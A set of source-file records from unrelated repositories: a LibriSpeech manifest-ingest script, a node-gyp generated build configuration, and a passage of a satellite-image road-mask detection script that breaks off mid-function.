97beac3332700720db92a2a52b747a1469c1e80d | 027bcc7f55e1c545856f388d14d6738c70700883 | /speech/data/ingest_librispeech.py | c01634ca64f71966dbe9618cb4d08cfb8e9b429d | [
"Apache-2.0"
] | permissive | robustfengbin/deepspeech | f3e6c2b80f87084d93cb707adc23605b5efcce3d | b3d430edb205efd43cb6601be8607e3c51619569 | refs/heads/master | 2021-01-11T10:56:42.901481 | 2016-12-10T22:32:02 | 2016-12-10T22:32:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,070 | py | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2015-2016 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import logging
import glob
import fnmatch
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def write_manifest(output_file, *filenames):
    """Write a comma-separated manifest pairing up the given filename lists.

    Each positional argument is a list of filenames; row i of the manifest
    contains the i-th entry of every list, joined by commas.  Returns True.
    """
    rows = (",".join(entries) + "\n" for entries in zip(*filenames))
    with open(output_file, "w") as fid:
        fid.writelines(rows)
    return True
def get_files(directory, pattern, recursive=True):
    """Return paths of files under ``directory`` whose basename matches the
    glob-style ``pattern`` (e.g. "*.wav").

    With recursive=False only the top level is searched and a lazy iterator
    is returned; otherwise the whole tree is walked and a list is returned.
    """
    if recursive is False:
        # Non-recursive: glob handles a single flat directory efficiently.
        return glob.iglob(os.path.join(directory, pattern))
    hits = []
    for dirpath, _dirnames, names in os.walk(directory):
        hits.extend(os.path.join(dirpath, name)
                    for name in fnmatch.filter(names, pattern))
    return hits
def main(input_directory, transcript_directory, manifest_file):
    """ Finds all .flac files recursively in input_directory, then extracts the
    transcript from the nearby .trans.txt file and stores it in
    transcript_directory. Writes a manifest file referring to each .flac file
    and its paired transcript.
    Arguments:
        input_directory (string): Path to librispeech directory
        transcript_directory (string): Path to directory in which to write
                                       individual transcript files.
        manifest_file (string): Path to manifest file to output.
    """
    def librispeech_flac_filename(filestr):
        # Map an utterance id like "84-121550-0000" onto the LibriSpeech
        # layout <input>/<speaker>/<chapter>/<utterance>.flac.
        parts = filestr.split("-")
        return os.path.join(input_directory, parts[0], parts[1],
                            "{}.flac".format(filestr))
    if not os.path.isdir(input_directory):
        raise IOError("Data directory does not exist! {}".format(input_directory))
    if not os.path.exists(transcript_directory):
        os.makedirs(transcript_directory)
    transcript_files = get_files(input_directory, pattern="*.txt")
    if len(transcript_files) == 0:
        logger.error("No .txt files were found in {}".format(input_directory))
        return
    logger.info("Beginning audio conversions")
    audio_files = list()
    txt_files = list()
    for ii, tfile in enumerate(transcript_files):
        # transcript file specifies transcript and flac filename for all librispeech files
        logger.info("Converting audio corresponding to transcript "
                    "{} of {}".format(ii, len(transcript_files)))
        with open(tfile, "r") as fid:
            lines = fid.readlines()
        for line in lines:
            # Each line is "<utterance-id> <transcript text...>".
            filestr, transcript = line.split(" ", 1)
            try:
                flac_file = librispeech_flac_filename(filestr)
            except IndexError:  # filestr is not the format we are expecting
                print("filestr of unexpected formatting: {}".format(filestr))
                print("error in {}".format(tfile))
                continue
            txt_file = os.path.join(transcript_directory,
                                    "{}.txt".format(filestr))
            # Write out short transcript file
            with open(txt_file, "w") as fid:
                fid.write(transcript.strip())
            # Add to output lists to be written to manifest
            audio_files.append(flac_file)
            txt_files.append(txt_file)
    logger.info("Writing manifest file to {}".format(manifest_file))
    return write_manifest(manifest_file, audio_files, txt_files)
if __name__ == "__main__":
    # Command-line entry point: positional args mirror main()'s parameters
    # (note the manifest file comes first on the command line).
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("manifest_file",
                        help="Output file that specifies the filename for each"
                             " output audio and transcript")
    parser.add_argument("input_directory",
                        help="Directory containing librispeech flac files")
    parser.add_argument("transcript_directory",
                        help="Directory to write transcript .txt files")
    args = parser.parse_args()
    main(args.input_directory,
         args.transcript_directory,
         args.manifest_file)
| [
"tyler@nervanasys.com"
] | tyler@nervanasys.com |
e323a7b70656382f9009af5a4de1ccca1ecb70fb | d7c1ca8277cdbc946ba82c5f0aef86d22d2c43f0 | /node_modules/bignum/build/config.gypi | 07b2952803e45d3ca36d9ccf361791210b4646a7 | [] | no_license | raullorenzo/Pallier | 61dc4a6f18933b690e95714acca063f86649af88 | cb1fe99573b2f03af635ad3f38a333d5af9de981 | refs/heads/master | 2020-06-30T00:28:26.611530 | 2016-11-21T20:11:29 | 2016-11-21T20:11:29 | 74,401,484 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,905 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"host_arch": "x64",
"icu_data_file": "icudt56l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt56l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "56",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/raul/.node-gyp/5.9.0",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"global_style": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/raul/.npm-init.js",
"userconfig": "/Users/raul/.npmrc",
"node_version": "5.9.0",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"progress": "true",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/raul/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/3.8.9 node/v5.9.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/2n/k3nmlyq90mdgdmtfhjx7rs980000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
| [
"raul.lorenzo.67@gmail.com"
] | raul.lorenzo.67@gmail.com |
1d88980928f6cf4ef48ca98063f11a2b663fe55c | 55020ba15fecc1b6cafb86b949dec7f0441c785b | /code/road_mask.py | 297ca6e8cae008d8d42b775ff40a3db37ae1f2d6 | [] | no_license | MingZx8/satellite | ec2386d67a615cc4031bfe811c2552d0fb163727 | 557d641cf826e65cfaa4861da36397191d12fa46 | refs/heads/master | 2023-04-20T00:32:02.749423 | 2021-05-10T15:29:50 | 2021-05-10T15:29:50 | 238,007,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,078 | py | # Python version: Python3.6
# @Author: MingZZZZZZZZ
# @Date created: 2020
# @Date modified: 2020
# Description:
import pandas as pd
import geopandas as gpd
from shapely.geometry import Polygon, LineString, Point
from shapely import wkt
import math
import numpy as np
import cv2
import difflib
import os
from sklearn.cluster import KMeans
from convert import point2pixel, get_scale, dist_in_image, dist2point
from generateLSD import generate
import random
def get_geo_index(point, gdf):
    """Return the index label of the row in *gdf* whose geometry is closest to *point*."""
    distances = gdf.geometry.distance(point)
    return distances.idxmin()
def pt2line(pt1, pt2):
    """Build a shapely LineString between two indexable (x, y) points."""
    # Index access keeps the original behavior for points that carry
    # extra coordinates beyond x and y.
    start = (pt1[0], pt1[1])
    end = (pt2[0], pt2[1])
    return LineString((start, end))
def get_angle(k1, k2, pair=True):
    """Classify the angle between two line slopes as paired (1) or not (0).

    NOTE(review): the radian-to-degree conversion multiplies by 360/pi
    (twice the conventional 180/pi), so the 3 / 45 thresholds below are
    expressed in that doubled scale -- confirm before "fixing" it, since
    downstream filtering was tuned to these values.
    """
    angle = math.atan((k1 - k2) / (1 + k1 * k2)) / math.pi * 360
    if pair:
        # Near-parallel test for pairing opposite road edges.
        return 1 if abs(angle) <= 3 else 0
    # Looser test: segment roughly follows the centreline direction.
    return 0 if abs(angle) >= 45 else 1
def get_perpendicular_point(x0, y0, a, c):
    """Project the point (x0, y0) onto the line y = a*x + c.

    Returns the foot of the perpendicular as an (x, y) tuple.

    Fixed: the previous y expression, (a**2*x0 + a*x0 + c) / (a**2 + 1),
    did not lie on the line (projecting (0, 1) onto y = x yielded
    (0.5, 0.0) instead of (0.5, 0.5)).  The correct foot satisfies
    y = a*x + c at the projected x, matching the sibling
    get_vertical_point implementation.
    """
    x = (x0 + a * y0 - a * c) / (a ** 2 + 1)
    return x, a * x + c
def get_vertical_point(pt, a, c):
    """Foot of the perpendicular dropped from *pt* onto the line y = a*x + c."""
    denom = a ** 2 + 1
    foot_x = (pt[0] + a * pt[1] - a * c) / denom
    foot_y = a * foot_x + c
    return foot_x, foot_y
def get_parallel_dist(pt0, pt1, pt2):
    """Distance from *pt0* to the infinite line through *pt1* and *pt2*.

    Returns (distance, x, y) where (x, y) is the foot of the perpendicular
    from pt0.  A vertical segment (equal x coordinates) is handled as a
    special case via the ZeroDivisionError path.
    """
    run = pt2[0] - pt1[0]
    rise = pt2[1] - pt1[1]
    try:
        slope = rise / run
    except ZeroDivisionError:
        # Vertical line: the horizontal offset is the distance, and the
        # foot shares pt0's y coordinate.
        return abs(pt0[0] - pt1[0]), pt1[0], pt0[1]
    intercept = pt1[1] - pt1[0] * slope
    dist = ((slope * pt0[0] - pt0[1] + intercept) ** 2 / (slope ** 2 + 1)) ** 0.5
    foot_x, foot_y = get_vertical_point(pt0, slope, intercept)
    return dist, foot_x, foot_y
def get_overlap_ratio(df_segment, fix_step, target_id, candidate_id):
    """Decide whether two LSD segments overlap enough to form a pair.

    Samples points along the target segment at roughly *fix_step* pixel
    spacing, projects each sample onto the candidate's supporting line,
    and counts how many projections fall within the candidate's x-extent.
    Returns 1 when at least 20% of the samples project onto the
    candidate, else 0.
    """
    target = df_segment.loc[target_id]
    candidate = df_segment.loc[candidate_id]
    # Candidate's supporting line: y = a*x + c.
    a = candidate.slope
    c = candidate.intercept
    # sample points on the target line
    slope = df_segment.loc[target_id, 'slope']
    intercept = df_segment.loc[target_id, 'intercept']
    pt_ls = []
    # Walk outward from (x1, y1) in both directions; each flag drops to 0
    # once that direction has stepped past the segment's x-range.
    left = right = 1
    # A fix_step-long step along the line projects onto an x step of
    # sqrt(fix_step^2 / (slope^2 + 1)).
    pt_x_r = target.x1 + (fix_step ** 2 / (slope ** 2 + 1)) ** 0.5
    pt_x_l = target.x1 - (fix_step ** 2 / (slope ** 2 + 1)) ** 0.5
    if pt_x_r > max(target.x1, target.x2):
        right = 0
    if pt_x_l < min(target.x1, target.x2):
        left = 0
    pt_x = target.x1
    while left or right:
        pt_ls.append((pt_x, slope * pt_x + intercept))
        # Net step: +x while only `right` is active, -x while only `left`
        # is active (both active cancels to staying put for one round).
        pt_x = pt_x + right * (fix_step ** 2 / (slope ** 2 + 1)) ** 0.5 - left * (
                fix_step ** 2 / (slope ** 2 + 1)) ** 0.5
        if pt_x > max(target.x1, target.x2):
            right = 0
        if pt_x < min(target.x1, target.x2):
            left = 0
    # Keep only projections landing within the candidate's x-extent.
    vertical_point_ls = [_ for _ in [get_vertical_point(i, a, c) for i in pt_ls]
                         if min(candidate.x1, candidate.x2) <= _[0] <= max(candidate.x1, candidate.x2)]
    try:
        overlap_ratio = len(vertical_point_ls) / len(pt_ls)  # fraction of samples overlapping the candidate
    except ZeroDivisionError:
        # No samples at all (both walk directions dead on entry).
        return 0
    return 0 if overlap_ratio < 0.2 else 1
def get_distance(df_segment, line1_id, line2_id, resolution):
    """Perpendicular distance (in metres) from line1's first endpoint to line2.

    line2 is treated as the infinite line y = slope*x + intercept; the
    pixel-space distance is scaled by *resolution* (metres per pixel).
    """
    start = df_segment.loc[line1_id]
    other = df_segment.loc[line2_id]
    slope = other.slope
    intercept = other.intercept
    x0, y0 = start.x1, start.y1
    # Foot of the perpendicular from (x0, y0) onto line2.
    foot_x = (x0 + slope * y0 - slope * intercept) / (slope ** 2 + 1)
    foot_y = slope * foot_x + intercept
    return ((y0 - foot_y) ** 2 + (x0 - foot_x) ** 2) ** 0.5 * resolution
def get_trans_dist(center_line, pt0, resolution):
    """Translation vector (dx, dy) moving *pt0* onto its nearest projection on *center_line*.

    For every polyline segment whose perpendicular foot falls inside the
    segment's bounding box, record the foot and its scaled distance; the
    closest such foot wins.  Raises if no segment admits a valid
    projection (empty min), matching the original behavior.
    """
    feet = {}
    scaled_dists = []
    for idx in range(len(center_line) - 1):
        seg_a = center_line[idx]
        seg_b = center_line[idx + 1]
        dist, foot_x, foot_y = get_parallel_dist(pt0, seg_a, seg_b)
        inside_x = min(seg_a[0], seg_b[0]) <= foot_x <= max(seg_a[0], seg_b[0])
        inside_y = min(seg_a[1], seg_b[1]) <= foot_y <= max(seg_a[1], seg_b[1])
        if inside_x and inside_y:
            metres = dist * resolution
            scaled_dists.append(metres)
            feet[idx] = [foot_x, foot_y, metres]
    best = min(scaled_dists)
    foot_x, foot_y = [(x, y) for _, (x, y, d) in feet.items() if d == best][0]
    return foot_x - pt0[0], foot_y - pt0[1]
def string_similar(s1, s2):
    """Upper-bound similarity ratio in [0, 1] between two strings (difflib quick_ratio)."""
    matcher = difflib.SequenceMatcher(None, s1, s2)
    return matcher.quick_ratio()
def main(
        file_path,
        latitude,
        longitude,
        show_selected_area=False,
        show_filtered_segment=False,
        show_paired_segment=False,
        show_mask=False,
        geo_file='/media/ming/data/GeospatialData/ONrte/ONrte.shp'
):
    '''
    Detect road masks around (latitude, longitude) in the satellite image
    under *file_path*, by pairing LSD line segments on either side of the
    geospatial road centreline and clustering their separations.

    :param file_path: str
        directory holding image/image.png and the working files
    :param latitude: float
    :param longitude: float
    :param show_selected_area: boolean
        display the detection area overlay interactively
    :param show_filtered_segment: boolean
        display the filtered LSD segments interactively
    :param show_paired_segment: boolean
        display paired segments interactively
    :param show_mask: boolean
        display the final per-line mask interactively
    :param geo_file: str
        where the geospatial data (shapefile) is located
    :return: pandas.Dataframe
        includes road width, road length and road mask in form
        shapely.geometry.Polygon (or None on early exit)
    '''
    # metres per pixel at this latitude
    resolution = get_scale(latitude)
    # file loading#################################################################################
    file_name = file_path.split('/')[-1]
    img_file = '{}/image/image.png'.format(file_path)
    # Per-tile cache of the geospatial subset lives next to the shapefile.
    geo_path = os.path.join('/'.join(geo_file.split('/')[:-1]), 'SubGeoFolder')
    try:
        os.mkdir(geo_path)
    except FileExistsError:
        pass
    geo_selected_name = '{}/{}'.format(geo_path, file_name)
    geo_line_name = '{}/line.csv'.format(file_path)
    line_name = '{}/lsd.txt'.format(file_path)
    geo_selected_file = '{}/geo_val.csv'.format(file_path)
    # initiate a fake polygon, in order to fill the dataframe with the same format data
    default_polygon = Polygon([(0, 0), (0, 0), (0, 0)])
    # load image
    img = cv2.imread(img_file)
    img_mask = img.copy()
    img_width = img.shape[1]
    img_height = img.shape[0]
    # NOTE(review): n is 0 when both image dimensions are below 1096px,
    # which would make the division below raise -- confirm inputs are
    # always at least 1096px on one side.
    n = max(img_width // 1096, img_height // 1096)
    resize_size = (img_width // n, img_height // n)
    # generate lsd file (LSD line-segment detection output) if missing
    if not os.path.exists(line_name):
        print('generate line segment...')
        generate(file_path)
    # build line segment dataframe###################################################
    df_segment = pd.read_csv(line_name, sep=' ', header=None).rename(
        columns=dict(enumerate(['x1', 'y1', 'x2', 'y2', 'width', 'p', '-log_nfa']))).drop(columns=7)
    df_segment['slope'] = (df_segment.y2 - df_segment.y1) / (df_segment.x2 - df_segment.x1)
    df_segment['intercept'] = df_segment.y1 - df_segment.slope * df_segment.x1
    # 'width' is repurposed here to mean the segment's length in pixels.
    df_segment['width'] = ((df_segment.y2 - df_segment.y1) ** 2 + (df_segment.x2 - df_segment.x1) ** 2) ** 0.5
    # split/read geospatial info
    print('loading geospatial file...')
    if os.path.exists(geo_selected_name):
        # Cached subset exists: load the first .csv or .shp found inside.
        # NOTE(review): if the folder contains neither, `gdf` is never
        # bound and the `gdf.empty` check below raises NameError -- verify
        # the cache folder is always populated.
        file_ls = os.listdir(geo_selected_name)
        for file in file_ls:
            if '.csv' in file:
                gdf = pd.read_csv(os.path.join(geo_selected_name, file))
                try:
                    # Re-hydrate WKT strings back into shapely geometries.
                    gdf['geometry'] = gdf['geometry'].apply(wkt.loads)
                except KeyError:
                    pass
                break
            if '.shp' in file:
                gdf = gpd.read_file(os.path.join(geo_selected_name, file))
                break
        if gdf.empty:
            return
        try:
            gdf.set_index('flag', inplace=True)
        except KeyError:
            # Cache lacks the 'flag' column: rebuild the subset from the
            # previously saved per-tile file.
            gdf = gpd.read_file(geo_selected_file)
            # ~0.01 degree buffer around the query point selects nearby roads.
            point = Point(longitude, latitude).buffer(0.01)
            gdf['selected'] = gdf.geometry.apply(point.intersects)
            gdf = gdf[gdf.selected]
            gdf['flag'] = gdf.index
            gdf.to_file(geo_selected_name)
    else:
        # First visit: subset the full provincial shapefile and cache it.
        gdf = gpd.read_file(geo_file)
        point = Point(longitude, latitude).buffer(0.01)
        gdf['selected'] = gdf.geometry.apply(point.intersects)
        gdf = gdf[gdf.selected]
        gdf['flag'] = gdf.index
        if gdf.empty:
            # Cache the empty result so the shapefile is not re-read next time.
            os.mkdir(geo_selected_name)
            gdf.to_csv('{}/{}'.format(geo_selected_name, file_name + '.csv'))
            return
        else:
            gdf.to_file(geo_selected_name)
    print('done')
    # ############################################################################################
    # Keep only the road centrelines that actually cross the image extent.
    # Image footprint in lon/lat, derived from resolution and image size.
    dlat_m = resolution * img_height / 2
    dlon_m = resolution * img_width / 2
    delta = dist2point(dlat_m, dlon_m, latitude)
    pt1 = (longitude - delta[1], latitude - delta[0])
    pt2 = (longitude + delta[1], latitude - delta[0])
    pt3 = (longitude - delta[1], latitude + delta[0])
    pt4 = (longitude + delta[1], latitude + delta[0])
    poly_img = Polygon([pt1, pt2, pt4, pt3])
    gdf['display'] = gdf.geometry.apply(poly_img.intersects)
    gdf_line = gdf[gdf['display']]
    gdf_line.fillna('None', inplace=True)
    gdf_line.to_csv(geo_line_name)
    if gdf_line.empty:
        return
    # choose the nearest centreline to the centre point, then grow the
    # selection along same-named, node-connected street segments
    nearest_index = get_geo_index(Point(longitude, latitude), gdf_line)
    gdf_line_selected = gdf_line[gdf_line['STREETNAME'] == gdf_line.loc[nearest_index, 'STREETNAME']]
    index_ls = gdf_line_selected.index.to_list()
    index_ls.remove(nearest_index)
    nearest_line_ls = [nearest_index]
    len_tmp = len(nearest_line_ls)
    head = gdf_line_selected.loc[nearest_index, 'FROMNODE']
    tail = gdf_line_selected.loc[nearest_index, 'TONODE']
    node_ls = [head, tail]
    # Greedy chain walk: keep appending any segment that shares a node
    # with the chain so far; stop when a full pass adds nothing.
    while len(nearest_line_ls) == len_tmp:
        len_tmp += 1
        for i in index_ls:
            head = gdf_line_selected.loc[i, 'FROMNODE']
            tail = gdf_line_selected.loc[i, 'TONODE']
            if head in node_ls or tail in node_ls:
                nearest_line_ls.append(i)
                index_ls.remove(i)
                node_ls.append(head)
                node_ls.append(tail)
                break
    gdf_line_selected = gdf_line_selected.loc[nearest_line_ls, :]
    # creating center lines (in pixel coordinates) for all gdf_line rows
    center_line_dict = {}
    for line_index in gdf_line.index:
        geo_info = gdf_line.loc[line_index]
        center_line_geo = geo_info.geometry.xy
        center_line_geo = list(zip(center_line_geo[0], center_line_geo[1]))
        center_line = list(map(lambda x: point2pixel(latitude, longitude, x[1], x[0], resolution), center_line_geo))
        # Shift origin from image centre to the top-left pixel convention.
        center_line = list(map(lambda x: (x[1] + img_width / 2, x[0] + img_height / 2), center_line))
        center_line_dict[line_index] = center_line
    for line_index in gdf_line_selected.index:
        geo_info = gdf_line.loc[line_index]
        # print(line_index)
        print('creating detecting area...')
        # default road width setting (lane count by CARTO road class;
        # presumably CARTO encodes the provincial road classification --
        # TODO confirm against the ONrte schema)
        lane_limit = 3 if (geo_info.CARTO < 4 and geo_info.SPD_KM < 70) else \
            2.2 if geo_info.CARTO == 5 else \
            1.5 if geo_info.CARTO == 6 else \
            4 if geo_info.ONEWAY else 5
        # search offset in pixels: 3.5 m per lane
        offset = 3.5 * lane_limit / resolution
        # the center line for this road
        center_line = center_line_dict[line_index]
        # slopes of each polyline segment (vertical segments skipped)
        center_line_slope = []
        for i in range(len(center_line) - 1):
            try:
                center_line_slope.append(
                    (center_line[i][1] - center_line[i + 1][1]) / (center_line[i][0] - center_line[i + 1][0]))
            except ZeroDivisionError:
                pass
        # creating selected area
        # boundary_area: union of buffers around every OTHER road, used to
        # exclude their pavement from this road's detection area
        boundary_area = 0
        for other_line_index in center_line_dict:
            if other_line_index == line_index:
                continue
            other_line = center_line_dict[other_line_index]
            other_line_buffer = LineString(other_line).buffer(3.5 / resolution, cap_style=2, join_style=2)
            if boundary_area == 0:
                boundary_area = other_line_buffer
            else:
                boundary_area = boundary_area.union(other_line_buffer)
        if boundary_area == 0:
            boundary_area = default_polygon

        def get_mask(selected_area, selected_area1, side='', signal=1):
            # Core per-road pipeline: filter LSD segments inside
            # selected_area, pair near-parallel segments, cluster their
            # separations to estimate the road width, and buffer the
            # centreline into mask polygons.
            # side: '' = both sides, '_1'/'_0' = one side only
            # signal: +1/-1 picks which side of the centreline to buffer
            # draw selected area
            overlay = img.copy()
            if type(selected_area) == Polygon:
                try:
                    center_line_buffer = list(
                        zip(map(int, selected_area.exterior.coords.xy[0]),
                            map(int, selected_area.exterior.coords.xy[1])))
                    cv2.drawContours(
                        overlay,
                        [np.array(center_line_buffer)],
                        -1,
                        (130, 197, 82),
                        thickness=cv2.FILLED)
                except AttributeError:
                    pass
            else:
                # MultiPolygon: drop pieces that do not touch the
                # centreline, draw the rest.
                new_selected_area = selected_area
                for poly in selected_area:
                    if not LineString(center_line).intersects(poly):
                        new_selected_area = new_selected_area.difference(poly)
                    else:
                        poly_buffer = list(
                            zip(map(int, poly.exterior.coords.xy[0]),
                                map(int, poly.exterior.coords.xy[1])))
                        cv2.drawContours(
                            overlay,
                            [np.array(poly_buffer)],
                            -1,
                            (130, 197, 82),
                            thickness=cv2.FILLED)
                selected_area = new_selected_area
            # accumulate the road length (metres) while drawing the centreline
            line_length = 0
            for i in range(len(center_line[:-1])):
                cv2.line(
                    overlay,
                    tuple(map(int, center_line[i])),
                    tuple(map(int, center_line[i + 1])),
                    (0, 0, 127),
                    thickness=5
                )
                line_length += dist_in_image(center_line[i], center_line[i + 1], img_height, img_width) * resolution
            cv2.addWeighted(
                overlay, 0.5, img, 0.5, 0, overlay
            )
            overlay = cv2.resize(overlay, resize_size, interpolation=cv2.INTER_CUBIC)
            if show_selected_area:
                cv2.imshow(' ', overlay)
                cv2.waitKey(0)
                cv2.destroyAllWindows()
            # filter out line segment out of the selected area and its length should be larger than 3 meters
            df_segment['geometry'] = df_segment.apply(lambda x: pt2line((x.x1, x.y1), (x.x2, x.y2)), axis=1)
            df_segment['filtered'] = df_segment.geometry.apply(selected_area.intersects)
            # filtered2: segment roughly parallel to at least one centreline piece
            df_segment['filtered2'] = df_segment['slope'].apply(
                lambda x: sum([get_angle(x, i, pair=False) for i in center_line_slope]) > 0)
            pair_name = '{}/lsd_pair_{}{}.csv'.format(file_path, line_index, side)
            pair_refine_name = '{}/lsd_refine_{}{}.csv'.format(file_path, line_index, side)
            mask_name = '{}/mask_{}{}.png'.format(file_path, line_index, side)
            # TODO: remove google map logo
            # minimum line segment setting (length threshold by road class)
            df_segment_filter = df_segment[df_segment.filtered & (df_segment.width > (
                5 / resolution if geo_info.CARTO < 4 else
                3 / resolution if geo_info.CARTO in [5, 6] else
                4 / resolution))
                                           & df_segment.filtered2]
            if show_filtered_segment:
                img_copy = img.copy()
                for i in df_segment_filter.index:
                    cv2.line(img_copy,
                             tuple(map(int, (df_segment_filter.loc[i, 'x1'], df_segment_filter.loc[i, 'y1']))),
                             tuple(map(int, (df_segment_filter.loc[i, 'x2'], df_segment_filter.loc[i, 'y2']))),
                             (23, 117, 187),
                             thickness=3
                             )
                img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
                cv2.imshow(' ', img_copy)
                cv2.waitKey(0)
                cv2.destroyAllWindows()
            # ###############################################################################################
            print('pairing segments...')
            # pair by slope (1 = near-parallel pair); cached to CSV per road/side
            if os.path.exists(pair_name):
                df_segment_pair = pd.read_csv(pair_name, index_col=0)
            else:
                df_segment_pair = pd.DataFrame(columns=df_segment_filter.index)
                for i in df_segment_filter.index:
                    for j in df_segment_filter.index.drop(i):
                        df_segment_pair.loc[i, j] = get_angle(df_segment_filter.loc[i, 'slope'],
                                                              df_segment_filter.loc[j, 'slope'])
                df_segment_pair.to_csv(pair_name)
            # refining the pairs: require mutual projection overlap
            print('refining...')
            # sampling step for get_overlap_ratio: a tenth of the mean segment length
            fix_step = df_segment_filter.width.mean() / 10
            if os.path.exists(pair_refine_name):
                df_segment_pair = pd.read_csv(pair_refine_name, index_col=0)
            else:
                for col in df_segment_pair.columns:
                    for row in df_segment_pair.index:
                        poly = Polygon(
                            [(df_segment.loc[int(row)].x1, df_segment.loc[int(row)].y1),
                             (df_segment.loc[int(row)].x2, df_segment.loc[int(row)].y2),
                             (df_segment.loc[int(col)].x1, df_segment.loc[int(col)].y1),
                             (df_segment.loc[int(col)].x2, df_segment.loc[int(col)].y2)]
                        )
                        df_segment_pair.loc[row, col] = get_overlap_ratio(df_segment, fix_step, int(row), int(col)) \
                                                        and get_overlap_ratio(df_segment, fix_step, int(col), int(row)) \
                                                        and df_segment_pair.loc[row, col]
                df_segment_pair.to_csv(pair_refine_name)
            # get distance for each pair; keep only plausible widths (3 m .. 21 m)
            dist_dict = {}
            for col in df_segment_pair.columns:
                for row in df_segment_pair.index:
                    if df_segment_pair.loc[row, col] == 1:
                        df_segment_pair.loc[row, col] = get_distance(df_segment, int(row), int(col), resolution)
                        if df_segment_pair.loc[row, col] <= 3 or df_segment_pair.loc[row, col] >= 3 * 7:
                            df_segment_pair.loc[row, col] = 0
                        else:
                            dist_dict[(row, col)] = df_segment_pair.loc[row, col]
            # show paired segments
            if show_paired_segment:
                pair_ls_all = []
                for col in df_segment_pair.columns:
                    for row in df_segment_pair.index:
                        try:
                            # CSV-loaded frames have string row labels; try
                            # that layout first, fall back to in-memory labels.
                            if df_segment_pair.loc[row, col] > 0 and df_segment_pair.loc[int(col), str(row)] > 0:
                                pair_ls_all.append(int(row))
                                pair_ls_all.append(int(col))
                        except KeyError:
                            if df_segment_pair.loc[row, col] > 0 and df_segment_pair.loc[col, row] > 0:
                                pair_ls_all.append(int(row))
                                pair_ls_all.append(int(col))
                img_copy = img.copy()
                for i in set(pair_ls_all):
                    cv2.line(img_copy,
                             tuple(map(int, (df_segment_filter.loc[i, 'x1'], df_segment_filter.loc[i, 'y1']))),
                             tuple(map(int, (df_segment_filter.loc[i, 'x2'], df_segment_filter.loc[i, 'y2']))),
                             (253, 200, 84),
                             thickness=3
                             )
                img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
                cv2.imshow(' ', img_copy)
                cv2.waitKey(0)
                cv2.destroyAllWindows()
            ############################################################################################
            # clustering the pair distances; pick k by an elbow heuristic
            print('clustering...')
            dist_ls = np.array(list(dist_dict.values())).reshape(-1, 1)
            SSE = []
            for k in range(1, 9):
                model = KMeans(k)
                try:
                    model.fit(dist_ls)
                except ValueError:
                    break
                SSE.append(model.inertia_)
            # plt.plot(list(range(1, 9)), SSE)
            # plt.show()
